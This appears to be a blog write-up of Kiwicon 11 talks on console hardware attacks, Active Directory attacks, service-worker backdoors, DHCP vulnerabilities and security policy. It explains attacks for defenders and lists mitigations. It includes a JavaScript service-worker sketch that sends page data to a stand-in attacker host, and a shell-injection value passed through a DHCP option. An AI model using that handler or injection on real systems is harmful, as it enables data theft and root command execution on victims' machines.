Kiwicon 11 Day 1 Afternoon

After a nice lunch at Husk (dirty fries and a very nice chocolate malt stout, in case you’re wondering), we’re back into it.

Lessons from game consoles and the coming security apocalypse

Boyd Multerer

Ex-Microsoft, where he worked on the Xbox team for 15 years, seeing three different Xboxes; he helped build the Xbox Live datacentre and XNA, and spent his last five years at Microsoft on the operating system team. His focus for this talk is not the datacentre or the Live network, but understanding that game consoles are big, high-performance IoT devices. If you’re thinking about the future of computing, you could learn a lot from the history of consoles.

The posture of game consoles is very different to the general-purpose PC:

  • PCs are generally only attacked by external parties.
  • Consoles are often attacked by people who are working with the owner of the console.
    • People who don’t want to pay for games.
    • People who want to repurpose the console to e.g. run Linux.
    • People who want to cheat to win.

The GoldenEye Attack

This was on the first Xbox. The game saved a screenshot of the player’s position to the memory card as part of the save game. People could edit the file on a PC and then stick it back in the Xbox: a picture of a penguin, with the save data corrupted to cause a buffer overflow, allowed people to run Linux.

If you don’t control the physical environment, you must sign all the things, scan inputs more carefully, and so on.

You Can’t Trust Anything

You can’t trust anything going over the bus, or your devices (such as the Xbox 360 drive). It’s common to see drives with rewritten firmware that fake valid discs.

The Attack

As the game is being read, the game code and content are checked cryptographically before being run, to be sure they haven’t been tampered with. But hackers put a chip on the board that watches the checks, waits until the processor is executing the right code, sees the register filling up with non-zero values, then drops the voltage to the processor to zero the register - which is interpreted as success, and allows the bad code to run.

So you can’t trust the register or memory, either.

Xbox One

The Xbox One has raised the bar massively around these things, but there are still weaknesses, and vulnerabilities are still being found, particularly around drivers and other dev-shipped content.


  • You can’t trust anything on the circuit board. Traces and components can be read and manipulated.
  • Don’t trust memory or even registers.
  • Ultimately, you can’t trust secrets in the CPU: anything that can be influenced by touching the motherboard or pins can and will be tampered with.
  • Assume memory is compromised.
  • Assume data on the bus has been leaked.
  • Every driver is an attack vector.

The last point is particularly critical. Why do you trust drivers? Who wrote them? Where do they come from?


Boyd believes this is the future of security - “we are all gonna have to get a lot more familiar with FPGAs”.

  • Move all security here.
    • “Your key material can never be in addressable memory”.
    • All key material and code must live here.
  • PUFs.
    • Physically Unclonable Functions.
    • In every chip, quantum-scale effects leave components slightly misaligned; every processor is effectively unique.
    • Chip design normally smooths this over; for security you might instead amplify the misalignment, using the micro-variation of the transistors as a source of unit-specific entropy.
  • Must be in the same die as the CPU.
    • If it is on another die, it can be tapped into too easily.
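The PUF idea can be sketched as deriving a stable per-chip key from noisy readings. Real designs use fuzzy extractors with error-correcting codes; this majority-vote version is the simplest possible illustration, with made-up data:

```javascript
// Each reading is the same physical measurement of the chip, as a bit
// array; individual bits flip occasionally because the effect is noisy.
function majorityVote(readings) {
  const bits = readings[0].length;
  const key = [];
  for (let i = 0; i < bits; i++) {
    const ones = readings.reduce((n, r) => n + r[i], 0);
    key.push(ones * 2 >= readings.length ? 1 : 0); // majority wins
  }
  return key;
}
```

The point is that the key is never stored anywhere - it is re-derived from the silicon itself each boot, so it never has to sit in addressable memory.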


  • Macrokernels are doomed. Microkernels are the only way to be properly secure, eliminating the drivers from privileged space.
  • All drivers must be in user mode.
  • Isolate as much as possible.
    • “I’ve become a huge fan of Erlang.”
    • You should be able to take down the smallest failing unit without taking down the system.
  • Formal modeling.
    • Take a look at Isabelle.
    • You can build a mathematical proof of the system, and then test your implementation against that proof.
    • “It takes about 20 lines of proof for every line of C.”
    • It’s a huge pain in the butt, but there are proofs for filesystems and kernels.

“Microkernels are not new. Move from the 1980s to the 1990s.” He acknowledges there is some performance penalty around this “but modern microkernels have better performance.”

Living w/o the Land - Active Directory attacks from Linux


  • Living off the land: You’ve got PowerShell! It does the thing!
    • Unfortunately it has logging and things.
    • This makes you sad.
  • So what happens if you don’t have a domain joined machine?
    • rpcclient
    • smbclient
    • Impacket
    • Responder
    • net
    • Metasploit
    • ldapdomaindump - this is awesome. Don’t need a domain joined machine to get all sorts of goodness.
    • Write your own.

Writing your own sucks. Happily someone has written an awesome tool called ADRecon. Pity it’s written in PowerShell. Which everyone can log. So that’s not great. So maybe Mubix’s efforts aren’t wasted.

  • AdminCount means you are or have been an Admin.
  • DNS Records are in AD.
  • So are BitLocker passwords.
  • And LAPS passwords.

The presenter chose not to use PHP or Java for unpacking the AD-resident ACLs, for reasons that are dumb. Apparently not being able to get Java libraries working makes Java dumb.

Ghosts in the Browser: Backdooring with Service Workers

Claudio Contin & Emmanuel Law

“A lot of people in the security industry are not aware of service workers; this is an exploratory talk on ways to exploit these.”

Exploiting XSS is hard:

  • HTTP-Only flags.
  • Cookies have limited server-side lifespan.
  • Transient payloads.
  • IP Restrictions.

Service workers sit in the background, don’t require any authentication, and don’t run in the frame of your web page; they are the core of progressive web apps (PWA). Service workers are a great way of glossing over network outages, running in the background and queueing work even when disconnected from the server.

Creating a new service worker is simple - navigator.serviceWorker.register('/sw.js') - but there are quite tight restrictions in place around where they can be loaded from. They have a lot of powers:
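A sketch of that registration in context, guarded so it’s a no-op outside a browser; the '/sw.js' path and root scope are just the example from the talk:

```javascript
// Registration sketch. Returns the granted scope, or null outside a browser.
async function installWorker() {
  if (typeof navigator === 'undefined' || !('serviceWorker' in navigator)) {
    return null; // not running in a browser page
  }
  // The script must come from the same origin, served with a JavaScript
  // Content-Type; a worker at '/sw.js' can claim the whole origin as scope.
  const registration = await navigator.serviceWorker.register('/sw.js', { scope: '/' });
  return registration.scope;
}
```

The restrictions bite here: the script must be same-origin, served with a JavaScript Content-Type, and its URL path bounds the maximum scope it can claim.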

  • Fetch()
    • Ability to make HTTP requests.
    • XMLHttpRequest deprecated in 2015.
    • Service Workers only have Fetch API availability.
    • Scope is limited to the CORS policy of the parent.
  • Background Sync
    • Register a sync.
    • Activate a sync whenever it is connected.

As an example, a C2 proxy can drive Service Workers running in the user’s browser context. This means the Service Worker now has the credentials of the web client - such as a user logged into an Internet banking application.

One challenge with this is that registering only happens once and wakeups of Service Workers happen with no control from the attacker. One way to work around this is to add more Service Workers to smooth out the sync cycle, although there are limits to the number of background syncs you can have installed.

“There are limitations, but can we do more to abuse this thing?”

  • Yes we can: Web Push.
  • This is a notification API.
  • You register a callback API, which can have malicious code in it.
  • The C2 push service asks for permission to run push services. The browser asks the users, some of whom will agree.
    • Note the first three pushes execute blindly, with no auth required.
    • On the desktop the browser must be running, but on mobile they will activate regardless.
  • Now we can send notifications and run code in the scope of the user browser, exfiltrating data.

  • Fetch Events: Different from the Fetch() API.

  • You can register fetch handlers in service workers, activating when the worker does; they act like a MITM inside the service worker infrastructure, inspecting and tampering with the cache in the browser or forcing it to fetch more resources.

  • Unlike the Fetch() API, this effectively gives access to manipulate the DOM, since HTML responses can be rewritten in flight.
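A sketch of the man-in-the-middle position a malicious fetch handler gets. The attacker URL and the “interesting path” heuristic are hypothetical, and the fetch implementation is injectable only so the sketch can be exercised outside a browser:

```javascript
// Hypothetical "interesting" paths an attacker might siphon off.
function shouldExfiltrate(url) {
  return url.includes('/account');
}

// A real worker would just use the global fetch().
async function handleFetch(event, fetchImpl = fetch) {
  const response = await fetchImpl(event.request);
  if (shouldExfiltrate(event.request.url)) {
    // clone() because a Response body can only be read once
    const body = await response.clone().text();
    fetchImpl('https://attacker.example/collect', { method: 'POST', body })
      .catch(() => {}); // fire and forget; don't break the page
  }
  return response; // the page sees the original response, none the wiser
}

// Inside a real service worker this is wired up as:
// self.addEventListener('fetch', (e) => e.respondWith(handleFetch(e)));
```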


  • No XSS; use a Content Security Policy.
  • Disallow JS Upload.
  • Serve uploads with Content-Type: text/plain in the response, which will stop the browser registering them as service workers.
  • Serve user content from a separate domain, which limits the scope of places service workers can register against.

Any of the above mitigations will stop these techniques from working.

  • Note Service Workers outlive the XSS and the malicious files. Once the service worker is loaded in the browser it lives forever.

    • You need to actively unregister the service workers when the users visit the site again if you discover your users have been compromised.
  • There are no out-of-the-box ways of disabling or managing service workers; they have written an extension to manage this in the browser.

Mayday, Mayday, Mayday - Safe Harbour, no more

Eliza Sorensen (@zemmiph0bia)

This talk comes with a content warning.

“As we know, some people cannot be trusted; this is where governments may step in and act in order to protect people.”

In the early history of the Internet, the Communications Decency Act was introduced, but its indecency provisions were shot down by the US Supreme Court. The Telecommunications Act passed in 1996 had a provision (Section 230) that exempted providers from liability as long as they do not exercise editorial control.

The FOSTA-SESTA package was introduced, supposedly to attack sex trafficking while not impacting consenting sex work. The EFF attacked the legislation, but it was nevertheless approved in 2018, in spite of opposition from anti-trafficking and sex worker organisations.

Unfortunately it is also affecting sex workers world-wide, even in New Zealand. While the act claims to improve matters for people who have been trafficked, evidence suggests that when sex work is illegal it renders victims of sexual abuse or sexual trafficking more vulnerable, since they cannot go to the police.

The Internet has actually made sex work safer; when Craigslist allowed sex workers to advertise independently, homicides against women in the US dropped 17%! That’s because sex workers could avoid the likes of pimps and the abuse they perpetrate.

Switter is a Mastodon social network with 176,000 users, a mix of sex workers and allies. Unfortunately, Cloudflare have suspended them from their service. I’ll note that this is the same Cloudflare that’s desperate to keep neo-Nazis online for “free speech.”

So what now? The EFF is fighting a case. We need to “stand the fuck up” and stop allowing “technologies we create” to be used to abuse vulnerable people.

DHCP is Hard

A Story of 5 Bugs

Felix Wilhelm

DHCP is 25 years old and very useful. DHCPv6 is a protocol that no-one uses but everyone supports just in case. This is great for attackers, because it’s an extra attack surface.

Both protocols seem harmless - small protocols with small packets - so they should be simple enough to implement reasonably robustly. But there are bugs, and you can exploit them and escalate via lateral movement. Client bugs are especially interesting, given how common it is for people to connect to (malicious) access points.

Most fields are uninteresting: fixed fields that are hard to implement poorly, and many are deprecated anyway. Options, on the other hand, are not fixed: each specifies a Type, Length, and Value. Since they’re optional there’s no guarantee a server or client will implement or support any given option or set of options. Note also that the encoding of types differs per option: some are lists of things, some are IP addresses, some are strings.

Encoding and decoding a range of data types opens you up to many, many mistakes. Moreover, options can be repeated and overloaded, and there are also vendor extensions, adding more possibility of errors.
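The option walk itself is simple, which is what makes the mistakes so common. A sketch using DHCPv4-style one-byte type and length fields (DHCPv6 options use two-byte fields); the bounds checks are exactly the lines that turn into CVEs when omitted:

```javascript
// Walk the Type-Length-Value options in a (partial) DHCP packet.
function parseOptions(buf) {
  const options = [];
  let i = 0;
  while (i < buf.length) {
    const type = buf[i];
    if (type === 255) break;              // END option: stop
    if (type === 0) { i += 1; continue; } // PAD option has no length byte
    if (i + 1 >= buf.length) throw new Error('truncated: missing length byte');
    const len = buf[i + 1];
    if (i + 2 + len > buf.length) throw new Error('truncated: value overruns packet');
    options.push({ type, value: buf.slice(i + 2, i + 2 + len) });
    i += 2 + len;
  }
  return options;
}
```

Every implementation repeats this loop for every option type it understands, in both directions, which is a lot of chances to skip a check.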

dnsmasq - CVE-2017-14493

Used in many places and “surprisingly popular”. A simple copying bug like it’s 1989. In 2018. Specific to the IPv6 handler, but really?


  • Has server and client components, the latter used in Debian, for example.
  • The client uses refcounting to free up memory structures for handling the options and iterating over them and acting on them.
  • Unfortunately the option handling code will not decrease the structure refcounter, and with enough packets you can overflow the counter and trigger a use-after-free error.
  • This is not trivial to trigger (it needs 200GB of traffic) but exists in both server and client.
  • Not trivial to exploit.

But that’s just the start of the fun!

  • The ISC DHCP client applies settings by passing the information from the options into scripts.
  • And arbitrary hooks.
  • So you’re running scripts with parameters from arbitrary, untrusted sources on the network.
  • While the pretty printer does the right thing as far as formatting binary into text, it uses a static 32k buffer to copy the data into.
  • IPv6 allows 56K option packets.

Network Manager

Continues to make everything worse. It renames all the environment variables created by dhclient, giving them a different naming convention. Then the Red Hat people integrating this into Fedora, CentOS and RHEL thought it would be a great idea to bulk-rename the options back to their dhclient names to be friendly to their legacy scripts - using eval() blocks in shell scripts, on untrusted input.

So you can e.g. set the WPAD option to foo' & touch /tmp/test123 and the command will run as root. This was a vulnerability that existed for five years.
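The fix amounts to quoting untrusted option values before they can ever reach a shell. A sketch of the quoting rule, written in JavaScript for consistency with the other examples here (the real dispatcher scripts are shell):

```javascript
// Single-quote the value and escape embedded single quotes, so shell
// metacharacters like & stay literal instead of becoming commands.
function shellQuote(value) {
  return "'" + value.replace(/'/g, "'\\''") + "'";
}

const payload = "foo' & touch /tmp/test123";   // the WPAD value from the talk
const unsafe = 'eval WPAD="' + payload + '"';  // roughly what the script did
const safe = 'WPAD=' + shellQuote(payload);    // injection stays a literal string
```

With the value single-quoted, the & and the embedded quote are just characters in a string, not commands.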

systemd’s networkd

  • The good bits: replaces the NetworkManager tire fire.
  • Doesn’t have external dependencies.
  • Modern C.
  • Clean rewrite (for better or worse).
  • But it’s C, which is an easy way to harm yourself.
  • And it cleanly re-implements an underflow in the DHCPv6 handling.
  • Which is enabled by default.
  • And can’t be disabled.


  • DHCP is harder than you think.
  • DHCPv6 is a rich source of vulnerabilities.

Getting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at Scale

moloch & mandatory

“Burp Intruder” at infinite QPS.

Normally the limit of Burp is your Internet speed and your single computer. It’s not “web scale”. But we can do the same thing with lambdas, storing the data in S3 buckets; these are billed at 20 cents per million requests plus the amount of memory you consume. The first million requests are free.

  • The first lambda invokes more lambdas based on a work queue; effectively a recursion.
    • A work queue with more than one element invokes two lambdas.
    • The work queue splits amongst the two lambdas.
    • This continues until a lambda has only one item in the queue.
    • At this point the lambda executes the work.
  • Out of the box you can run 1,000 lambdas per second.
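The recursive fan-out above can be modelled locally. This sketch just counts invocations and runs the leaf work directly, standing in for real Lambda invocations (which would each be a separate call into AWS):

```javascript
// Split the queue in half until each "lambda" holds one item, then do the
// work. The shared counter stands in for the number of Lambda invocations.
function fanOut(queue, execute, invocations = { count: 0 }) {
  invocations.count += 1;
  if (queue.length <= 1) {
    if (queue.length === 1) execute(queue[0]);
    return invocations.count;
  }
  const mid = Math.ceil(queue.length / 2);
  fanOut(queue.slice(0, mid), execute, invocations);
  fanOut(queue.slice(mid), execute, invocations);
  return invocations.count;
}
```

Splitting n items costs roughly 2n-1 invocations, but in the real thing the leaves all run in parallel, which is the whole point.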

Cloud Rainbow tables.

  • Rainbow tables are pre-computed attacks against hashed password files.
  • This is good in theory, but iterating over the hash with the rainbow table can become very time-consuming.
  • The file sizes are large, and really need to run on servers.
  • So this makes them ideal for cloud!
  • Google BigQuery lets you cram terabytes of JSON in and run queries against it.

Cost Effective GPUs

Traditional GPU clusters have high capital cost, ongoing maintenance problems, and horrible power consumption. So what’s the answer?

  • EC2 spot instances.
  • Elastic Beanstalk for management.
  • Auto-scale spot instances can be defined in Elastic Beanstalk so it only triggers on price.
  • API gateways fronting lambda instances.
  • Hashcat on EC2 to do the work.

Securing a World of Physically Capable Computers

Bruce Schneier

“I think we have some profound changes coming, because everything is turning into a computer, from the smallest things to a power plant. Cars, fridges, you name it.”

We suddenly have to secure everything, everywhere. Here are six lessons:

  1. Most software is poorly written and insecure, because the market doesn’t want to pay for quality software.
  2. We’ve never designed with security in mind, particularly for the Internet, because the endpoints were, originally, trusted.
    • We’re still living with this decision, which we are slowly retrofitting to protocols from the 70s and 80s.
  3. The extensibility of computerised systems can be used against us.
    • Your phone can do anything you want. That never used to be the case.
    • The implications of this are poorly understood. This is why e.g. Internet connected cars can be ransomware.
  4. The complexity of computerised systems means they are vulnerable; complexity is the enemy of security.
    • Security is improving, but complexity is accelerating.
  5. When you connect things together, vulnerabilities multiply.
    • Break-ins happen through HVAC. Through fish tanks.
    • These are hard to fix, because you don’t know who is at fault. Each system could be secure individually, but joining them exposes a vulnerability that didn’t exist before.
  6. Attacks get better, easier, faster.
    • We are used to this, but the rest of the world isn’t.
    • Passwords that were strong enough yesterday aren’t strong enough today.

There are other problems: for one, expertise flows downhill. Yesterday’s super-secret NSA technique is today’s FBI tool, and tomorrow script kiddies are using it. Stingray devices are a great example of this; they used to be top secret and now people use them to send spam.

Automation, autonomy, and physical effects are changing security. Security experts tend to focus on the first part of confidentiality, integrity, and availability; for example, we worry a lot about privacy breaches because they are common. But while those can be dangerous, there’s a gulf between an information disclosure from my bank and someone being able to disable the brakes on my car, or take control of an automated weapons system.

In the same vein, there is a fundamental difference between the CPU in your computer crashing and the controller in your pacemaker crashing. They may even have the same CPU and OS; it’s the context that makes all the difference.

Unfortunately we don’t know how to write secure software; as a result, we’ve become very good at patching. Companies like Apple and Microsoft can ship fixes in very little time, and push them out to hundreds of millions of devices. Unfortunately, we have no idea how to do this for the things that are becoming computers. Many of these new devices - smart fridges, DVRs, smart TVs - don’t have a way to patch them, and even if they did, the vendor doesn’t have a team of people standing by to fix problems anyway. Yet we expect these devices to last a decade or more, and we have no idea how to secure twenty-year-old systems.

Will car manufacturers learn to treat software like mechanical parts? We can’t even secure DVRs!

Passwords are great, but they aren’t strong enough, and 2FA is clumsy even when it’s available. So we’re struggling with people authenticating, but now we need to cope with thing-to-thing authentication. And not just at the scale of using our phone as an IoT hub for a few dozen devices in our household; it’s having tens of thousands of things talking constantly, and often on an ad-hoc basis - our cars co-ordinating collision detection, for example.

The next disaster is the supply chain. This has always been terrible, but we’ve ignored it because it’s too hard. Can the US trust Kaspersky and Huawei? Can China trust Check Point and McAfee? What’s really made where? And by whom? There are probably a hundred passports in any team of any consequence at any vendor. We find backdoors in Juniper and D-Link; we can’t even trust the shipping process, since we learned that the busy beavers at the NSA will intercept and interfere with things in the mail.

And while that Bloomberg story probably isn’t true, the most interesting thing it tells us is that we don’t even really know. Our industries are deeply international, and we have no idea what comes from where.

Everything is failing as it becomes connected. We’re seeing our weaknesses revealed. And in the past we haven’t been punished or regulated because it hasn’t really mattered. But that, Bruce thinks, is going to change. Policy is going to be brought to bear on our industry: standards and regulations. We’ve talked a lot about how tech can subvert the law, but as Snowden showed us, the law can subvert tech. Bruce thinks it’s vitally important that policy ends up going the right way, and he has two key ideas about this:

Firstly, defence must dominate, because everything is now connected. It used to be easy to rationalise sabotaging “their things”, because their things and our things had a clean separation, but this no longer exists. If we allow their stuff to be insecure so we can exploit it, our stuff will also be insecure. If we leave backdoors for “our side”, then their side will be able to use them against us, too.

The second point is that we need to accept better regulation. The devil is in the details - but regulation done right can be good. Many of the Silicon Valley types don’t want to hear this, but it’s true. Regulation gets us safe food, for example. And regulation is going to happen, so it’s a choice between good and bad regulation; we’d best get on board.

Equifax got away scot-free. Facebook probably will, too. But we can see with the GDPR, or the EU’s emerging standards around interoperability, patch management, or secure-by-default design, that changes are emerging. Since the market doesn’t reward security, we’re going to have to rely on governments, whether supranational like the EU, or regional like California or New York.

As a result, we need to be involved in policy. Because if the tech isn’t understood and well-represented the policy will be bad. And so we need to share our knowledge and expertise.